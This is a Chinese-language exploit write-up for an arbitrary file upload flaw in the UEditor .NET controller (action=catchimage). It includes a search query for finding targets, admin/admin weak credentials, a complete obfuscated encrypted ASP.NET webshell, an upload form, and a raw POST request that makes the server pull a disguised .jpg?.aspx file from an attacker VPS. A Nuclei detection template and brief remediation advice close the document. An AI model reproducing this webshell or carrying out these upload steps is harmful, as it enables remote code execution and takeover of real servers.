Ueditor编辑器任意文件上传漏洞

# 搜索语法app="Baidu-UEditor"

# 弱口令信息username:adminpassword:admin
# 拼接路径/UEditor/net/controller.ashx?action=catchimage    //访问控制器文件

Hello Administrator!WelCome To Tas9er ASP.NET Console!<html></html>{;}<%@ImPoRt NaMeSpAce="System.Reflection"%><%Session[System.Text.Encoding.Default.GetString(Convert.FromBase64String("aw=="))]=System.Text.Encoding.ASCII.GetString(new byte[1] { (byte)(49) })+System.Text.Encoding.ASCII.GetString(new byte[1] { (byte)(54) })+System.Text.Encoding.Default.GetString(Convert.FromBase64String("YWNhY2MwNWFhZmFmNg=="))+System.Text.Encoding.ASCII.GetString(new byte[1] { (byte)(55) });%><%Session["gov"]="https://"+"shanghai.g"+"ov.cn";byte[] govZOP = Encoding.Default.GetBytes/*govWtxmLcuJYrxv*/(Session[Convert.ToInt32(System.Text.Encoding.ASCII.GetString(new byte[1] { (byte)(48) }))] + ""),govEdMOitZS = Request.BinaryRead/*govMz0weIj7S*/(Request.ContentLength);Assembly.Load(new System./*govRv8OITDLS*/Security/*govF7lZUVwJqIAX4*/.Cryptography/*govhhALchHtr*/./*govrhP7JsMzemvU30*/RijndaelManaged()/*govMBHPX3IkG*/.CreateDecryptor(govZOP, govZOP).TransformFinalBlock/*govcGlT0*/(govEdMOitZS, Convert.ToInt32(System.Text.Encoding.Default.GetString(Convert.FromBase64String("MA=="))), govEdMOitZS.Length))./*govFwclSCiayWd*/CreateInstance(System.Text.Encoding.Default./*govqryY9gkAt37pt*/GetString(Convert.FromBase64String("VQ==")))/*govDcI95u*/.Equals(this);%><%@ PagE LaNguAge="C#" %>

# 上传HTML文件内容<form action="http://ip/ueditor/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded"  method="POST">  <p>shell addr: <input type="text" name="source[]" /></p >  <input type="submit" value="Submit" /></form>
# 图片地址http://vpsip/ue1.jpg?.aspx   //备注：在VPS上的是以ue1.jsp存在，但在上传时时要带上?.aspx的后缀

# webshell地址http://ip/ueditor/net/upload/image/20230920/6383080145411107007710081.aspx

POST /ueditor/net/controller.ashx?action=catchimage HTTP/1.1Host: ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencodedContent-Length: 65Origin: nullConnection: closeUpgrade-Insecure-Requests: 1
source[]=http://ip/8080/ue1.jpg?.aspx

id: ueditor-file-upload
info:  name: UEditor - Arbitrary File Upload  author: princechaddha  severity: high  description: UEditor contains an arbitrary file upload vulnerability. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code, As a result, an attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.  reference:    - https://zhuanlan.zhihu.com/p/85265552    - https://www.freebuf.com/vuls/181814.html  classification:    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H    cvss-score: 8.8    cwe-id: CWE-434  tags: ueditor,fileupload  metadata:    max-request: 1
http:  - method: GET    path:      - "{{BaseURL}}/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"      - "{{BaseURL}}/net/controller.ashx?action=catchimage&encode=utf-8"      - "{{BaseURL}}/admin/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"      - "{{BaseURL}}/editor/controller.ashx?action=catchimage&encode=utf-8"      - "{{BaseURL}}/scripts/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"      - "{{BaseURL}}/js/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"      - "{{BaseURL}}/ueditor/controller.ashx?action=catchimage&encode=utf-8"      - "{{BaseURL}}/plugins/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"      - "{{BaseURL}}/ue/net/controller.ashx?action=catchimage&encode=utf-8"      - "{{BaseURL}}/content/scripts/plugins/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"      - "{{BaseURL}}/controller.ashx?action=catchimage&encode=utf-8"      - "{{BaseURL}}/content/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"      - "{{BaseURL}}/assets/js/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"      - "{{BaseURL}}/core/controller.ashx?action=catchimage&encode=utf-8"      - "{{BaseURL}}/editor/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"      - "{{BaseURL}}/components/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"      - "{{BaseURL}}/utility/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"      - "{{BaseURL}}/plugin/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"      - "{{BaseURL}}/script/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"      - "{{BaseURL}}/areas/admin/content/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"      - "{{BaseURL}}/hieditor/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"      - "{{BaseURL}}/manage/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"      - "{{BaseURL}}/utf8-net/net/controller.ashx?action=catchimage&encode=utf-8"      - "{{BaseURL}}/content/js/plugins/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"      - "{{BaseURL}}/editor/net/controller.ashx?action=catchimage&encode=utf-8"    matchers-condition: and    matchers:      - type: status        status:          - 200      - type: word        words:          - "没有指定抓取源"        part: body

1.修改工程目录下net/App_Code/CrawlerHandler.cs文件，添加对文件类型检查的代码。2.使用各类WAF软件，防止攻击者上传恶意文件。3.检查文件上传路径下是否有近期上传的畸形图片；检查是否存在asp，aspx等类型危险文件。如果发现异常文件，请判断后及时删除。